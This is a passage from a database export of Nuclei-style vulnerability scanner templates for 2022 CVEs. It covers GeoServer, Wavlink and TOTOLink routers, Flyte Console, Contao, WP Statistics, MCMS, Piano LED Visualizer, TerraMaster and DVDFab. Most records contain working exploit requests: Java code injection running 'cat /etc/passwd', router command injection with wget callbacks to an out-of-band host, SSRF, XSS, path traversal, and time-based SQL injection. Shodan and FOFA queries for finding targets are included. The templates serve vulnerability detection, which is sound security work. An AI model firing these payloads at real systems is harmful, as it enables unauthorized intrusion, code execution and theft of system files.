epss-percentile: 0.98506\n cpe: cpe:2.3:a:geosolutionsgroup:jai-ext:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: geosolutionsgroup\n product: jai-ext\n shodan-query: /geoserver/\n fofa-query: app=\"GeoServer\"\n tags: cve,cve2022,geoserver,rce,geosolutionsgroup\n\nhttp:\n - raw:\n - |\n POST /geoserver/wms HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/xml\n\n <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n <wps:Execute version=\"1.0.0\" service=\"WPS\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns=\"http://www.opengis.net/wps/1.0.0\" xmlns:wfs=\"http://www.opengis.net/wfs\" xmlns:wps=\"http://www.opengis.net/wps/1.0.0\" xmlns:ows=\"http://www.opengis.net/ows/1.1\" xmlns:gml=\"http://www.opengis.net/gml\" xmlns:ogc=\"http://www.opengis.net/ogc\" xmlns:wcs=\"http://www.opengis.net/wcs/1.1.1\" 
xmlns:xlink=\"http://www.w3.org/1999/xlink\" xsi:schemaLocation=\"http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd\">\n <ows:Identifier>ras:Jiffle</ows:Identifier>\n <wps:DataInputs>\n <wps:Input>\n <ows:Identifier>coverage</ows:Identifier>\n <wps:Data>\n <wps:ComplexData mimeType=\"application/arcgrid\"><![CDATA[ncols 720 nrows 360 xllcorner -180 yllcorner -90 cellsize 0.5 NODATA_value -9999 316]]></wps:ComplexData>\n </wps:Data>\n </wps:Input>\n <wps:Input>\n <ows:Identifier>script</ows:Identifier>\n <wps:Data>\n <wps:LiteralData>dest = y() - (500); // */ public class Double { public static double NaN = 0; static { try { java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream())); String line = null; String allLines = \" - \"; while ((line = reader.readLine()) != null) { allLines += line; } throw new RuntimeException(allLines);} catch (java.io.IOException e) {} }} /**</wps:LiteralData>\n </wps:Data>\n </wps:Input>\n <wps:Input>\n <ows:Identifier>outputType</ows:Identifier>\n <wps:Data>\n <wps:LiteralData>DOUBLE</wps:LiteralData>\n </wps:Data>\n </wps:Input>\n </wps:DataInputs>\n <wps:ResponseForm>\n <wps:RawDataOutput mimeType=\"image/tiff\">\n <ows:Identifier>result</ows:Identifier>\n </wps:RawDataOutput>\n </wps:ResponseForm>\n </wps:Execute>\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n - \"ExceptionInInitializerError\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221008c43a89e6024f154e1c9ec73d2af5b54a9fe62ce9de2200c4c749d86d684bcac02206e61c587bb72efa57e89b3e5d7522186d366d6693a3fefd7dcf278d233235347:922c64590222798bb761d5b6d8e72950", "hash": "5ff42a9cdf4c57f33e03aa4d95f78c33", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084c5" }, "name": "CVE-2022-24856.yaml", "content": "id: 
CVE-2022-24856\n\ninfo:\n name: Flyte Console <0.52.0 - Server-Side Request Forgery\n author: pdteam\n severity: high\n description: |\n FlyteConsole is the web user interface for the Flyte platform. FlyteConsole prior to version 0.52.0 is vulnerable to server-side request forgery when FlyteConsole is open to the general internet. An attacker can exploit any user of a vulnerable instance to access the internal metadata server or other unauthenticated URLs. Passing of headers to an unauthorized actor may occur.\n impact: |\n An attacker can exploit this vulnerability to perform unauthorized actions, such as accessing internal resources, bypassing security controls, or launching further attacks.\n remediation: |\n The patch for this issue deletes the entire cors_proxy, as this is no longer required for the console. A patch is available in FlyteConsole version 0.52.0, or as a work-around disable FlyteConsole.\n reference:\n - https://github.com/flyteorg/flyteconsole/security/advisories/GHSA-www6-hf2v-v9m9\n - https://github.com/flyteorg/flyteconsole/pull/389\n - https://hackerone.com/reports/1540906\n - https://nvd.nist.gov/vuln/detail/CVE-2022-24856\n - https://github.com/flyteorg/flyteconsole/commit/05b88ed2d2ecdb5d8a8404efea25414e57189709\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-24856\n cwe-id: CWE-918\n epss-score: 0.08397\n epss-percentile: 0.94255\n cpe: cpe:2.3:a:flyte:flyte_console:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: flyte\n product: flyte_console\n tags: cve2022,cve,flyteconsole,ssrf,oss,hackerone,flyte\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cors_proxy/https://oast.me/\"\n\n matchers:\n - type: word\n words:\n - \"Interactsh Server\"\n# digest: 490a00463044022011000b62bbdc9d5f28cdb1540f0177002809856e4f065b19296986952d6abac5022034c9d32e197b3f27d3f1d38e02891c4f95987145301f02da2555758516aef94e:922c64590222798bb761d5b6d8e72950", "hash": 
"b351a0884a1b6c6158b729ebc54831d8", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084c6" }, "name": "CVE-2022-2486.yaml", "content": "id: CVE-2022-2486\n\ninfo:\n name: Wavlink WN535K2/WN535K3 - OS Command Injection\n author: For3stCo1d\n severity: critical\n description: |\n Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade via manipulation of the argument key. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network.\n remediation: |\n Apply the latest firmware update provided by the vendor to mitigate this vulnerability.\n reference:\n - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20mesh.cgi.md\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2486\n - https://vuldb.com/?id.204537\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2486\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-2486\n cwe-id: CWE-78\n epss-score: 0.97331\n epss-percentile: 0.99879\n cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wavlink\n product: wl-wn535k2_firmware\n shodan-query: http.title:\"Wi-Fi APP Login\"\n tags: cve2022,cve,iot,wavlink,router,rce,oast\n\nhttp:\n - raw:\n - |\n GET /cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://{{interactsh-url}};%27 HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n\n - type: status\n status:\n - 500\n# digest: 
4b0a00483046022100b34c9aac4b9a1b672c0d52fd667187a1d74768987e33b4d41b8b694a9f5802f5022100ed27bf9f661bb4e7471c509027150bf34f2905d0b15ff35d6fcd1b08022ad4ec:922c64590222798bb761d5b6d8e72950", "hash": "c4bb54b5df6e3acf12b8b3be328e1a8b", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084c7" }, "name": "CVE-2022-2487.yaml", "content": "id: CVE-2022-2487\n\ninfo:\n name: Wavlink WN535K2/WN535K3 - OS Command Injection\n author: For3stCo1d\n severity: critical\n description: |\n Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection which affects unknown code in /cgi-bin/nightled.cgi via manipulation of the argument start_hour. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network.\n remediation: |\n Apply the latest firmware update provided by the vendor to mitigate this vulnerability.\n reference:\n - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20nightled.cgi%20.md\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2487\n - https://vuldb.com/?id.204538\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2487\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-2487\n cwe-id: CWE-78\n epss-score: 0.97404\n epss-percentile: 0.99916\n cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wavlink\n product: wl-wn535k2_firmware\n shodan-query: http.title:\"Wi-Fi APP Login\"\n tags: cve,cve2022,iot,wavlink,router,rce,oast\nvariables:\n cmd: \"id\"\n\nhttp:\n - raw:\n - |\n @timeout: 10s\n POST /cgi-bin/nightled.cgi HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n 
page=night_led&start_hour=;{{cmd}};\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"uid=\"\n - \"gid=\"\n - \"nightStart\"\n condition: and\n\n - type: word\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 480a00453043022063c0e55419c9314aa4179cbc620cda3fb24c5a8ec5f8a5bf570b4744cf6fd2d4021f5a44d8882c4a8b74f1f1a6a3d2651b10ecd553f39eb188a71f5c135ab2cde4:922c64590222798bb761d5b6d8e72950", "hash": "e2fbd3eb59546ef9c24a8184b34665b0", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084c8" }, "name": "CVE-2022-2488.yaml", "content": "id: CVE-2022-2488\n\ninfo:\n name: Wavlink WN535K2/WN535K3 - OS Command Injection\n author: For3stCo1d\n severity: critical\n description: |\n Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in /cgi-bin/touchlist_sync.cgi via manipulation of the argument IP. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network.\n remediation: |\n Apply the latest firmware update provided by the vendor to mitigate this vulnerability.\n reference:\n - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20touchlist_sync.cgi.md\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2488\n - https://vuldb.com/?id.204539\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2488\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-2488\n cwe-id: CWE-78\n epss-score: 0.97392\n epss-percentile: 0.99908\n cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wavlink\n product: wl-wn535k2_firmware\n 
shodan-query: http.title:\"Wi-Fi APP Login\"\n tags: cve,cve2022,iot,wavlink,router,rce,oast\n\nhttp:\n - raw:\n - |\n GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://{{interactsh-url}}; HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n\n - type: status\n status:\n - 500\n# digest: 4a0a004730450220356cde1b887b5746d09e420786e7774b8306e1e99f930120cb47996c24a275b2022100a3c3b2747f775e12938742f69218d9d03766d557418c26f563d6c42da95b6326:922c64590222798bb761d5b6d8e72950", "hash": "428915f8d5a641711af8dd679a2f39c1", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084c9" }, "name": "CVE-2022-24899.yaml", "content": "id: CVE-2022-24899\n\ninfo:\n name: Contao <4.13.3 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: |\n Contao prior to 4.13.3 contains a cross-site scripting vulnerability. It is possible to inject arbitrary JavaScript code into the canonical tag.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in a victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: As a workaround, users may disable canonical tags in the root page settings.\n reference:\n - https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/\n - https://github.com/contao/contao/security/advisories/GHSA-m8x6-6r63-qvj2\n - https://nvd.nist.gov/vuln/detail/CVE-2022-24899\n - https://contao.org/en/security-advisories/cross-site-scripting-via-canonical-url.html\n - https://github.com/contao/contao/commit/199206849a87ddd0fa5cf674eb3c58292fd8366c\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-24899\n cwe-id: CWE-79\n epss-score: 0.00342\n epss-percentile: 0.70926\n cpe: cpe:2.3:a:contao:contao:*:*:*:*:*:*:*:*\n 
metadata:\n max-request: 1\n vendor: contao\n product: contao\n shodan-query: title:\"Contao\"\n tags: cve,cve2022,contao,xss,huntr\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/contao/%22%3e%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"></script><script>alert(document.domain)</script>'\n - '\"Not authenticated\"'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n# digest: 4b0a00483046022100dd79aa0474a89a2ac03e8147296d8958bd8863792570ee2d226ce4ef2bb5fe47022100f21bdc20c0df7169bf401f396d4d70048dddd98be918337c91d990bd543060b1:922c64590222798bb761d5b6d8e72950", "hash": "911e4044fbdb44853cab7631c3da4f05", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084ca" }, "name": "CVE-2022-24900.yaml", "content": "id: CVE-2022-24900\n\ninfo:\n name: Piano LED Visualizer 1.3 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: |\n Piano LED Visualizer 1.3 and prior are vulnerable to local file inclusion.\n impact: |\n An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the local file inclusion vulnerability in the Piano LED Visualizer 1.3 application.\n reference:\n - https://github.com/onlaj/Piano-LED-Visualizer/issues/350\n - https://vuldb.com/?id.198714\n - https://nvd.nist.gov/vuln/detail/CVE-2022-24900\n - https://github.com/onlaj/Piano-LED-Visualizer/commit/3f10602323cd8184e1c69a76b815655597bf0ee5\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\n cvss-score: 8.6\n cve-id: CVE-2022-24900\n cwe-id: CWE-668,CWE-22\n epss-score: 0.00999\n epss-percentile: 0.81936\n cpe: cpe:2.3:a:piano_led_visualizer_project:piano_led_visualizer:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: 
piano_led_visualizer_project\n product: piano_led_visualizer\n tags: cve2022,cve,lfi,piano,iot,oss,piano_led_visualizer_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/change_setting?second_value=no_reload&disable_sequence=true&value=../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220769f0b22c82a753d0e8d77f012b14207ab4c56507605203f5ed415c7de1fcce0022100b0dfc7497219b96863930792f0fc57dd921a58d19ee3eccdbb2cbe6364059fc6:922c64590222798bb761d5b6d8e72950", "hash": "1a936e4614bebc1b14fca5e94674ca59", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084cb" }, "name": "CVE-2022-24990.yaml", "content": "id: CVE-2022-24990\n\ninfo:\n name: TerraMaster TOS < 4.2.30 Server Information Disclosure\n author: dwisiswant0\n severity: high\n description: TerraMaster NAS devices running TOS prior to version 4.2.30 are vulnerable to information disclosure.\n impact: |\n An attacker can exploit this vulnerability to gain sensitive information about the server, potentially leading to further attacks.\n remediation: |\n Upgrade the TerraMaster TOS server to version 4.2.30 or later to mitigate the vulnerability.\n reference:\n - https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/\n - https://www.broadcom.com/support/security-center/attacksignatures/detail?asid=33732\n - https://forum.terra-master.com/en/viewforum.php?f=28\n - http://packetstormsecurity.com/files/172904/TerraMaster-TOS-4.2.29-Remote-Code-Execution.html\n - https://github.com/ArrestX/--POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-24990\n cwe-id: CWE-306\n epss-score: 0.9593\n epss-percentile: 0.99416\n cpe: cpe:2.3:o:terra-master:terramaster_operating_system:*:*:*:*:*:*:*:*\n 
metadata:\n max-request: 1\n vendor: terra-master\n product: terramaster_operating_system\n shodan-query: \"TerraMaster\"\n tags: cve,cve2022,packetstorm,terramaster,exposure,kev,terra-master\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/module/api.php?mobile/webNasIPS\"\n\n headers:\n User-Agent: \"TNAS\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/json\"\n - \"TerraMaster\"\n condition: and\n\n - type: regex\n part: body\n regex:\n - \"webNasIPS successful\"\n - \"(ADDR|(IFC|PWD|[DS]AT)):\"\n - \"\\\"((firmware|(version|ma(sk|c)|port|url|ip))|hostname)\\\":\"\n condition: or\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221009ccfe394bc6b8b31a756bb60d7542f8fa5d38bf65d3321043f1b75787cd1df0d022100e3ca4a315ae22f1611dd448073eb23a4fb2ad50d182e63e1037d0e816c1544a2:922c64590222798bb761d5b6d8e72950", "hash": "94ae8f914b394f4b46dd785b9309effc", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084cc" }, "name": "CVE-2022-25082.yaml", "content": "id: CVE-2022-25082\n\ninfo:\n name: TOTOLink - Unauthenticated Command Injection\n author: gy741\n severity: critical\n description: |\n TOTOLink A950RG V5.9c.4050_B20190424 and V4.1.2cu.5204_B20210112 were discovered to contain a command injection vulnerability in the Main function. 
This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network.\n remediation: |\n Apply the latest firmware update provided by the vendor to fix the command injection vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/cve-2022-25082\n - https://github.com/EPhaha/IOT_vuln/blob/main/TOTOLink/A950RG/README.md\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-25082\n cwe-id: CWE-78\n epss-score: 0.0417\n epss-percentile: 0.92009\n cpe: cpe:2.3:o:totolink:a950rg_firmware:4.1.2cu.5204_b20210112:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: totolink\n product: a950rg_firmware\n tags: cve,cve2022,totolink,router,unauth,rce,iot,intrusive\nvariables:\n cmd: \"`ls>../{{randstr}}`\"\n\nhttp:\n - raw:\n - |\n GET /cgi-bin/downloadFlile.cgi?payload={{cmd}} HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /{{randstr}} HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_2\n words:\n - .sh\n - .cgi\n condition: and\n\n - type: word\n part: header_2\n words:\n - application/octet-stream\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100ab2d16fe98044552f6b033c5d66ef9d749c2577f4ba89980e3804e6e0961c42002204911d612998bfb262eb6fdacd0a6fc2a9e74331eeba778603ed15a039ec9d16b:922c64590222798bb761d5b6d8e72950", "hash": "3fc65947abb638fd076245bcf9d652d5", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084cd" }, "name": "CVE-2022-25125.yaml", "content": "id: CVE-2022-25125\n\ninfo:\n name: MCMS 5.2.4 - SQL Injection\n author: Co5mos\n severity: critical\n description: |\n MCMS 5.2.4 contains a SQL injection vulnerability via search.do in the file /mdiy/dict/listExcludeApp. 
An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in MCMS 5.2.4.\n reference:\n - https://github.com/ming-soft/MCMS/issues/90\n - https://gitee.com/mingSoft/MCMS/issues/I4TGYI\n - https://nvd.nist.gov/vuln/detail/CVE-2022-25125\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-25125\n cwe-id: CWE-89\n epss-score: 0.02031\n epss-percentile: 0.87716\n cpe: cpe:2.3:a:mingsoft:mcms:5.2.4:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: mingsoft\n product: mcms\n shodan-query: http.favicon.hash:1464851260\n fofa-query: icon_hash=\"1464851260\"\n tags: cve,cve2022,sqli,mcms,mingsoft\nvariables:\n num: \"999999999\"\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/mdiy/dict/listExcludeApp?query=1&dictType=1&orderBy=1/**/or/**/updatexml(1,concat(0x7e,md5('{{num}}'),0x7e),1)/**/or/**/1\"\n\n headers:\n Content-Type: application/x-www-form-urlencoded\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"c8c605999f3d8352d7bb792cf3fdb25\"\n\n - type: word\n part: header\n words:\n - \"application/json\"\n# digest: 4a0a0047304502210082b6a248202fef50a86c36616626d308355488ad6aa5d4ef24b183158f17b9b0022006b63a9e980e50f042f60dbe4457b4bd55a23a77f4cc51ce5d2057ae661a61b1:922c64590222798bb761d5b6d8e72950", "hash": "ccdd9fe1437b2dd020ba4ee7e1e29ef8", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084ce" }, "name": "CVE-2022-25148.yaml", "content": "id: CVE-2022-25148\n\ninfo:\n name: WordPress Plugin WP 
Statistics <= 13.1.5 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the current_page_id parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5.\n remediation: Update wp-statistics plugin to version 13.1.6, or newer.\n reference:\n - https://wordpress.org/plugins/wp-statistics/\n - https://gist.github.com/Xib3rR4dAr/5dbd58b7f57a5037fe461fba8e696042\n - https://nvd.nist.gov/vuln/detail/CVE-2022-25148\n - http://packetstormsecurity.com/files/174482/WordPress-WP-Statistics-13.1.5-SQL-Injection.html\n - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2679983%40wp-statistics&new=2679983%40wp-statistics&sfp_email=&sfph_mail=\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-25148\n cwe-id: CWE-89\n epss-score: 0.10089\n epss-percentile: 0.94364\n cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: veronalabs\n product: wp_statistics\n framework: wordpress\n google-query: inurl:/wp-content/plugins/wp-statistics\n tags: cve,cve2022,packetstorm,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n - |\n @timeout: 15s\n GET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home&current_page_id=sleep(6)&search_query&page_uri=/&user_id=0 HTTP/1.1\n Host: {{Hostname}}\n\n host-redirects: true\n matchers:\n - type: dsl\n dsl:\n - duration>=6\n - status_code == 200\n - contains(header, 
\"application/json\")\n - contains(body, 'Visitor Hit was recorded successfully')\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - '_wpnonce=([0-9a-zA-Z]+)'\n internal: true\n# digest: 4a0a00473045022100ca848fcb45e23d7d210462b4aa7c89510aa622fe4bb4c0639f5035c1e09b2a5902205b9422a4700bd06f51bc7edd9a951403e9ad2145500336c3690f7beed9414f5a:922c64590222798bb761d5b6d8e72950", "hash": "d31e97aee5e757a44d0eac61dba5a16e", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084cf" }, "name": "CVE-2022-25149.yaml", "content": "id: CVE-2022-25149\n\ninfo:\n name: WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection\n author: theamanrawat\n severity: high\n description: |\n The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the IP parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5.\n reference:\n - https://wordpress.org/plugins/wp-statistics/\n - https://gist.github.com/Xib3rR4dAr/5dbd58b7f57a5037fe461fba8e696042\n - https://nvd.nist.gov/vuln/detail/CVE-2022-25149\n - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2679983%40wp-statistics&new=2679983%40wp-statistics&sfp_email=&sfph_mail=\n - https://www.wordfence.com/vulnerability-advisories/#CVE-2022-25149\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-25149\n cwe-id: CWE-89\n epss-score: 0.36793\n epss-percentile: 0.97067\n cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: veronalabs\n product: wp_statistics\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/wp-statistics/\"\n tags: 
cve2022,cve,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n - |\n @timeout: 50s\n GET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip='-sleep(6)-'&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home&current_page_id=0&search_query&page_uri=/&user_id=0 HTTP/1.1\n Host: {{Hostname}}\n\n host-redirects: true\n matchers:\n - type: dsl\n dsl:\n - duration>=6\n - status_code == 200\n - contains(header, \"application/json\")\n - contains(body, 'Visitor Hit was recorded successfully')\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - '_wpnonce=([0-9a-zA-Z]+)'\n internal: true\n# digest: 4a0a00473045022100f3ab364d23921ccdb931455c9ebd80865bd26ddd8d85a85e5c2f6fc86842424e022068720cfe546b2bb14a734450dfc5bdad56751bcdaef77f99acb548fddcb1ac38:922c64590222798bb761d5b6d8e72950", "hash": "3cb4fd434939b9535d9a0a4e7f090463", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084d0" }, "name": "CVE-2022-25216.yaml", "content": "id: CVE-2022-25216\n\ninfo:\n name: DVDFab 12 Player/PlayerFab - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: DVDFab 12 Player/PlayerFab is susceptible to local file inclusion which allows a remote attacker to download any file on the Windows file system for which the user account running DVDFab 12 Player (recently renamed PlayerFab) has read-access.\n impact: |\n The vulnerability allows an attacker to include arbitrary local files, potentially leading to unauthorized access, information disclosure.\n remediation: |\n Apply the latest patch or update from the vendor to fix the vulnerability.\n reference:\n - https://www.tenable.com/security/research/tra-2022-07\n - https://nvd.nist.gov/vuln/detail/CVE-2022-25216\n - https://github.com/ARPSyndicate/kenzer-templates\n - 
https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-25216\n cwe-id: CWE-22\n epss-score: 0.01345\n epss-percentile: 0.85828\n cpe: cpe:2.3:a:dvdfab:12_player:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dvdfab\n product: 12_player\n tags: cve,cve2022,dvdFab,lfi,lfr,tenable,dvdfab\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/download/C%3a%2fwindows%2fsystem.ini\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"bit app support\"\n - \"fonts\"\n - \"extensions\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402203f6ae7c1e6a044dfb0d2128ba0584e801d970fb9556d08d9a0525a2a896768f502202d00ccb4c7597331865d1c3b386225396ccb8816353db36cda136dc03489c824:922c64590222798bb761d5b6d8e72950", "hash": "a386740debd13d999fafdbe53438000c", "level": 